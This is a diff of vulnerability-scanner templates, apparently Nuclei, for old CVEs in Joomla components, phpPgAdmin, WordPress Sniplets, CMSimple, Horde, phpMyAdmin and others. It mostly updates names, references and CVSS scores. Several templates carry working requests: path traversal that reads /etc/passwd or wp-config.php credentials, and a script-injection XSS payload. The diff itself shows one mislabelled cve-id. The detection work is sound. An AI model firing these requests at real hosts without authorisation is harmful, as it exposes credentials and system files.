diff --git a/cves/2006/CVE-2006-1681.yaml b/cves/2006/CVE-2006-1681.yaml
index 83e7678985..283b857a26 100644
--- a/cves/2006/CVE-2006-1681.yaml
+++ b/cves/2006/CVE-2006-1681.yaml
@@ -1,12 +1,14 @@
id: CVE-2006-1681
info:
- name: Cherokee HTTPD <=0.5 XSS
+ name: Cherokee HTTPD <=0.5 - Cross-Site Scripting
author: geeknik
severity: medium
- description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
+ description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- - https://www.securityfocus.com/bid/17408
+ - http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/
+ - http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/
+ - http://www.vupen.com/english/advisories/2006/1292
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
classification:
cve-id: CVE-2006-1681
@@ -30,3 +32,5 @@ requests:
part: header
words:
- text/html
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2006/CVE-2006-2842.yaml b/cves/2006/CVE-2006-2842.yaml
index 8afac3689e..9834d5ffee 100644
--- a/cves/2006/CVE-2006-2842.yaml
+++ b/cves/2006/CVE-2006-2842.yaml
@@ -1,18 +1,22 @@
id: CVE-2006-2842
info:
- name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
+ name: Squirrelmail <=1.4.6 - Local File Inclusion
author: dhiyaneshDk
severity: high
- description: 'PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute
- arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals
- is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there
- might be relevant real-world environments under which this vulnerability is applicable.'
+ description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.
reference:
- https://www.exploit-db.com/exploits/27948
+ - http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE
+ - http://www.squirrelmail.org/security/issue/2006-06-01
+ - http://web.archive.org/web/20160915101900/http://secunia.com/advisories/20406/
+ - https://nvd.nist.gov/vuln/detail/CVE-2006-2842
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
cve-id: CVE-2006-2842
- tags: cve2006,lfi,squirrelmail,cve
+ cwe-id: CWE-22
+ tags: cve,cve2006,lfi,squirrelmail,edb
requests:
- method: GET
@@ -29,3 +33,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2007/CVE-2007-0885.yaml b/cves/2007/CVE-2007-0885.yaml
index 2cc0670c14..4c0e56ac25 100644
--- a/cves/2007/CVE-2007-0885.yaml
+++ b/cves/2007/CVE-2007-0885.yaml
@@ -1,12 +1,15 @@
id: CVE-2007-0885
info:
- name: Rainbow.Zen Jira XSS
+ name: Jira Rainbow.Zen - Cross-Site Scripting
author: geeknik
severity: medium
- description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
+ description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference:
- - https://www.securityfocus.com/archive/1/459590/100/0/threaded
+ - http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded
+ - https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418
+ - https://nvd.nist.gov/vuln/detail/CVE-2007-0885
classification:
cve-id: CVE-2007-0885
tags: cve,cve2007,jira,xss
@@ -30,3 +33,5 @@ requests:
part: header
words:
- "text/html"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2007/CVE-2007-4504.yaml b/cves/2007/CVE-2007-4504.yaml
index 44ac9a5200..98144c6f06 100644
--- a/cves/2007/CVE-2007-4504.yaml
+++ b/cves/2007/CVE-2007-4504.yaml
@@ -1,16 +1,21 @@
id: CVE-2007-4504
info:
- name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval
+ name: Joomla! RSfiles <=1.0.2 - Local File Inclusion
author: daffainfo
severity: high
- description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
+ description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://www.cvedetails.com/cve/CVE-2007-4504
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
+ - https://nvd.nist.gov/vuln/detail/CVE-2007-4504
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
cve-id: CVE-2007-4504
- tags: cve,cve2007,joomla,lfi
+ cwe-id: CWE-22
+ tags: lfi,edb,cve,cve2007,joomla
requests:
- method: GET
@@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml
index ab30957300..7bae9bf531 100644
--- a/cves/2007/CVE-2007-4556.yaml
+++ b/cves/2007/CVE-2007-4556.yaml
@@ -5,11 +5,12 @@ info:
author: pikpikcu
severity: critical
description: |
- Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
+ Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
reference:
- https://www.guildhab.top/?p=2326
- https://nvd.nist.gov/vuln/detail/CVE-2007-4556
- https://cwiki.apache.org/confluence/display/WW/S2-001
+ - http://forums.opensymphony.com/ann.jspa?annID=54
classification:
cve-id: CVE-2007-4556
tags: cve,cve2007,apache,rce,struts
diff --git a/cves/2007/CVE-2007-5728.yaml b/cves/2007/CVE-2007-5728.yaml
index 2adfe607de..f9b21ef140 100644
--- a/cves/2007/CVE-2007-5728.yaml
+++ b/cves/2007/CVE-2007-5728.yaml
@@ -1,17 +1,21 @@
id: CVE-2007-5728
info:
- name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting
+ name: phpPgAdmin <=4.1.1 - Cross-Site Scripting
author: dhiyaneshDK
severity: medium
- description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
+ description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.
reference:
- https://www.exploit-db.com/exploits/30090
+ - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
+ - http://web.archive.org/web/20210130131735/https://www.securityfocus.com/bid/24182/
+ - http://web.archive.org/web/20161220160642/http://secunia.com/advisories/25446/
+ - https://nvd.nist.gov/vuln/detail/CVE-2007-5728
classification:
cve-id: CVE-2007-5728
metadata:
shodan-query: http.title:"phpPgAdmin"
- tags: cve,cve2007,xss,pgadmin,phppgadmin
+ tags: cve,cve2007,xss,pgadmin,phppgadmin,edb
requests:
- method: GET
@@ -33,3 +37,5 @@ requests:
part: header
words:
- "text/html"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2008/CVE-2008-1059.yaml b/cves/2008/CVE-2008-1059.yaml
new file mode 100644
index 0000000000..5d90733c1f
--- /dev/null
+++ b/cves/2008/CVE-2008-1059.yaml
@@ -0,0 +1,39 @@
+id: CVE-2008-1059
+
+info:
+ name: WordPress Sniplets 1.1.2 - Local File Inclusion
+ author: dhiyaneshDK
+ severity: high
+ description: |
+ PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/5194
+ - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
+ - https://nvd.nist.gov/vuln/detail/CVE-2008-1059
+ - https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2008-1061
+ cwe-id: CWE-22
+ tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/cves/2008/CVE-2008-1061.yaml b/cves/2008/CVE-2008-1061.yaml
new file mode 100644
index 0000000000..3e17bab6ba
--- /dev/null
+++ b/cves/2008/CVE-2008-1061.yaml
@@ -0,0 +1,40 @@
+id: CVE-2008-1061
+
+info:
+ name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
+ author: dhiyaneshDK
+ severity: medium
+ description: |
+ WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
+ reference:
+ - https://www.exploit-db.com/exploits/5194
+ - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
+ - https://nvd.nist.gov/vuln/detail/CVE-2008-1061
+ - http://secunia.com/advisories/29099
+ classification:
+ cve-id: CVE-2008-1061
+ tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2008/CVE-2008-2398.yaml b/cves/2008/CVE-2008-2398.yaml
index d82031abc8..1f91e0a6b6 100644
--- a/cves/2008/CVE-2008-2398.yaml
+++ b/cves/2008/CVE-2008-2398.yaml
@@ -1,12 +1,16 @@
id: CVE-2008-2398
info:
- name: AppServ Open Project 2.5.10 and earlier XSS
+ name: AppServ Open Project <=2.5.10 - Cross-Site Scripting
author: unstabl3
severity: medium
- description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
+ description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
reference:
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
+ - http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/
+ - http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/
+ - http://securityreason.com/securityalert/3896
+ - https://nvd.nist.gov/vuln/detail/CVE-2008-2398
classification:
cve-id: CVE-2008-2398
tags: cve,cve2008,xss
@@ -30,3 +34,5 @@ requests:
words:
- "text/html"
part: header
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml
index 2c186cd941..727eba9f89 100644
--- a/cves/2008/CVE-2008-2650.yaml
+++ b/cves/2008/CVE-2008-2650.yaml
@@ -1,29 +1,40 @@
-id: CVE-2008-2650
+id: CVE-2008-2650
-info:
- name: CMSimple 3.1 - Local File Inclusion
- author: pussycat0x
- severity: high
- description: |
- Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
- reference: https://www.exploit-db.com/exploits/5700
- classification:
- cve-id: CVE-2008-2650
- tags: cve,cve2008,lfi
+info:
+ name: CMSimple 3.1 - Local File Inclusion
+ author: pussycat0x
+ severity: high
+ description: |
+ CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
+ reference:
+ - http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17
+ - http://web.archive.org/web/20210121182016/https://www.securityfocus.com/bid/29450/
+ - http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463
+ - https://nvd.nist.gov/vuln/detail/CVE-2008-2650
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
+ cve-id: CVE-2008-2650
+ cwe-id: CWE-22
+ tags: cve,cve2008,lfi,cmsimple
-requests:
- - raw:
- - |
- GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: regex
- regex:
- - "root:.*:0:0:"
- part: body
+requests:
+ - raw:
+ - |
+ GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2008/CVE-2008-4668.yaml b/cves/2008/CVE-2008-4668.yaml
index b021243349..9a7dd52117 100644
--- a/cves/2008/CVE-2008-4668.yaml
+++ b/cves/2008/CVE-2008-4668.yaml
@@ -1,16 +1,19 @@
id: CVE-2008-4668
info:
- name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
+ name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
author: daffainfo
severity: high
- description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
+ description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6618
- https://www.cvedetails.com/cve/CVE-2008-4668
+ - http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/
+ - http://securityreason.com/securityalert/4464
+ - https://nvd.nist.gov/vuln/detail/CVE-2008-4668
classification:
cve-id: CVE-2008-4668
- tags: cve,cve2008,joomla,lfi
+ tags: cve,cve2008,joomla,lfi,edb
requests:
- method: GET
@@ -27,3 +30,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2008/CVE-2008-4764.yaml b/cves/2008/CVE-2008-4764.yaml
index c200752dfd..4b90a27a79 100644
--- a/cves/2008/CVE-2008-4764.yaml
+++ b/cves/2008/CVE-2008-4764.yaml
@@ -1,17 +1,22 @@
id: CVE-2008-4764
info:
- name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
+ name: Joomla! <=2.0.0 RC2 - Local File Inclusion
author: daffainfo
severity: high
- description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in
- a show_error action.
+ description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference:
- https://www.exploit-db.com/exploits/5435
- https://www.cvedetails.com/cve/CVE-2008-4764
+ - http://web.archive.org/web/20210121181347/https://www.securityfocus.com/bid/28764/
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873
+ - https://nvd.nist.gov/vuln/detail/CVE-2008-4764
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
cve-id: CVE-2008-4764
- tags: cve,cve2008,joomla,lfi
+ cwe-id: CWE-22
+ tags: edb,cve,cve2008,joomla,lfi
requests:
- method: GET
@@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2008/CVE-2008-5587.yaml b/cves/2008/CVE-2008-5587.yaml
index ebf602921e..3e5a2f3635 100644
--- a/cves/2008/CVE-2008-5587.yaml
+++ b/cves/2008/CVE-2008-5587.yaml
@@ -1,17 +1,21 @@
id: CVE-2008-5587
info:
- name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
+ name: phpPgAdmin <=4.2.1 - Local File Inclusion
author: dhiyaneshDK
severity: medium
- description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
+ description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/7363
+ - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
+ - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
+ - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
+ - https://nvd.nist.gov/vuln/detail/CVE-2008-5587
classification:
cve-id: CVE-2008-5587
metadata:
shodan-query: http.title:"phpPgAdmin"
- tags: cve2008,lfi,phppgadmin
+ tags: cve,cve2008,lfi,phppgadmin,edb
requests:
- method: GET
@@ -28,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2008/CVE-2008-6080.yaml b/cves/2008/CVE-2008-6080.yaml
index 075e57a751..7a5240ac84 100644
--- a/cves/2008/CVE-2008-6080.yaml
+++ b/cves/2008/CVE-2008-6080.yaml
@@ -1,16 +1,22 @@
id: CVE-2008-6080
info:
- name: Joomla! Component ionFiles 4.4.2 - File Disclosure
+ name: Joomla! ionFiles 4.4.2 - Local File Inclusion
author: daffainfo
severity: high
- description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+ description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/6809
- https://www.cvedetails.com/cve/CVE-2008-6080
+ - http://web.archive.org/web/20140804231654/http://secunia.com/advisories/32377/
+ - http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/
+ - https://nvd.nist.gov/vuln/detail/CVE-2008-6080
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
cve-id: CVE-2008-6080
- tags: cve,cve2008,joomla,lfi
+ cwe-id: CWE-22
+ tags: edb,cve,cve2008,joomla,lfi
requests:
- method: GET
@@ -27,3 +33,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2008/CVE-2008-6172.yaml b/cves/2008/CVE-2008-6172.yaml
index 9b3280e643..362a408e8f 100644
--- a/cves/2008/CVE-2008-6172.yaml
+++ b/cves/2008/CVE-2008-6172.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
+ - http://web.archive.org/web/20140804232841/http://secunia.com/advisories/32367/
+ - http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/
classification:
cve-id: CVE-2008-6172
- tags: cve,cve2008,joomla,lfi
+ tags: cve2008,joomla,lfi,edb,cve
requests:
- method: GET
diff --git a/cves/2008/CVE-2008-6222.yaml b/cves/2008/CVE-2008-6222.yaml
index b5447a9956..dd11e3ad7a 100644
--- a/cves/2008/CVE-2008-6222.yaml
+++ b/cves/2008/CVE-2008-6222.yaml
@@ -1,16 +1,22 @@
id: CVE-2008-6222
info:
- name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
+ name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
- description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
+ description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6980
- https://www.cvedetails.com/cve/CVE-2008-6222
+ - http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/
+ - http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/
+ - https://nvd.nist.gov/vuln/detail/CVE-2008-6222
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
cve-id: CVE-2008-6222
- tags: cve,cve2008,joomla,lfi
+ cwe-id: CWE-22
+ tags: cve2008,joomla,lfi,edb,cve
requests:
- method: GET
@@ -27,3 +33,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2008/CVE-2008-6668.yaml b/cves/2008/CVE-2008-6668.yaml
index ed5ce42391..781876d1ea 100644
--- a/cves/2008/CVE-2008-6668.yaml
+++ b/cves/2008/CVE-2008-6668.yaml
@@ -1,16 +1,21 @@
id: CVE-2008-6668
info:
- name: nweb2fax <= 0.2.7 Directory Traversal
+ name: nweb2fax <=0.2.7 - Local File Inclusion
author: geeknik
severity: high
- description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
+ description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.
reference:
- https://www.exploit-db.com/exploits/5856
+ - http://web.archive.org/web/20210130035550/https://www.securityfocus.com/bid/29804
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
cve-id: CVE-2008-6668
- tags: nweb2fax,lfi,cve,cve2008,traversal
+ cwe-id: CWE-22
+ tags: cve2008,nweb2fax,lfi,traversal,edb,cve
requests:
- method: GET
@@ -20,10 +25,14 @@ requests:
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
+
- type: regex
part: body
regex:
- "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-0545.yaml b/cves/2009/CVE-2009-0545.yaml
index 53b6417ad6..3103602795 100644
--- a/cves/2009/CVE-2009-0545.yaml
+++ b/cves/2009/CVE-2009-0545.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/8023
- https://nvd.nist.gov/vuln/detail/CVE-2009-0545
+ - http://www.zeroshell.net/eng/announcements/
+ - http://www.ikkisoft.com/stuff/LC-2009-01.txt
classification:
cve-id: CVE-2009-0545
- tags: cve,cve2009,zeroshell,kerbynet,rce
+ tags: edb,cve,cve2009,zeroshell,kerbynet,rce
requests:
- method: GET
diff --git a/cves/2009/CVE-2009-0932.yaml b/cves/2009/CVE-2009-0932.yaml
index 0bf0d808c8..747fd013f0 100644
--- a/cves/2009/CVE-2009-0932.yaml
+++ b/cves/2009/CVE-2009-0932.yaml
@@ -1,16 +1,21 @@
id: CVE-2009-0932
info:
- name: Horde - Horde_Image::factory driver Argument LFI
+ name: Horde/Horde Groupware - Local File Inclusion
author: pikpikcu
severity: high
- description: Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
+ description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
reference:
- https://www.exploit-db.com/exploits/16154
+ - http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5
+ - http://web.archive.org/web/20161228102217/http://secunia.com/advisories/33695
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
cve-id: CVE-2009-0932
- tags: cve,cve2009,horde,lfi,traversal
+ cwe-id: CWE-22
+ tags: cve,cve2009,horde,lfi,traversal,edb
requests:
- method: GET
@@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml
index 49485fc6a8..366b3af91b 100644
--- a/cves/2009/CVE-2009-1151.yaml
+++ b/cves/2009/CVE-2009-1151.yaml
@@ -1,16 +1,22 @@
id: CVE-2009-1151
info:
- name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
+ name: PhpMyAdmin Scripts - Remote Code Execution
author: princechaddha
- severity: high
- description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
+ severity: critical
+ description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
+ - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
+ - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
+ - https://nvd.nist.gov/vuln/detail/CVE-2009-1151
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
cve-id: CVE-2009-1151
- tags: cve,cve2009,phpmyadmin,rce,deserialization
+ cwe-id: CWE-77
+ tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce
requests:
- raw:
@@ -32,3 +38,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-1496.yaml b/cves/2009/CVE-2009-1496.yaml
index 4ab863864d..66d11ba7e3 100644
--- a/cves/2009/CVE-2009-1496.yaml
+++ b/cves/2009/CVE-2009-1496.yaml
@@ -1,16 +1,21 @@
id: CVE-2009-1496
info:
- name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
+ name: Joomla! Cmimarketplace 0.1 - Local File Inclusion
author: daffainfo
severity: high
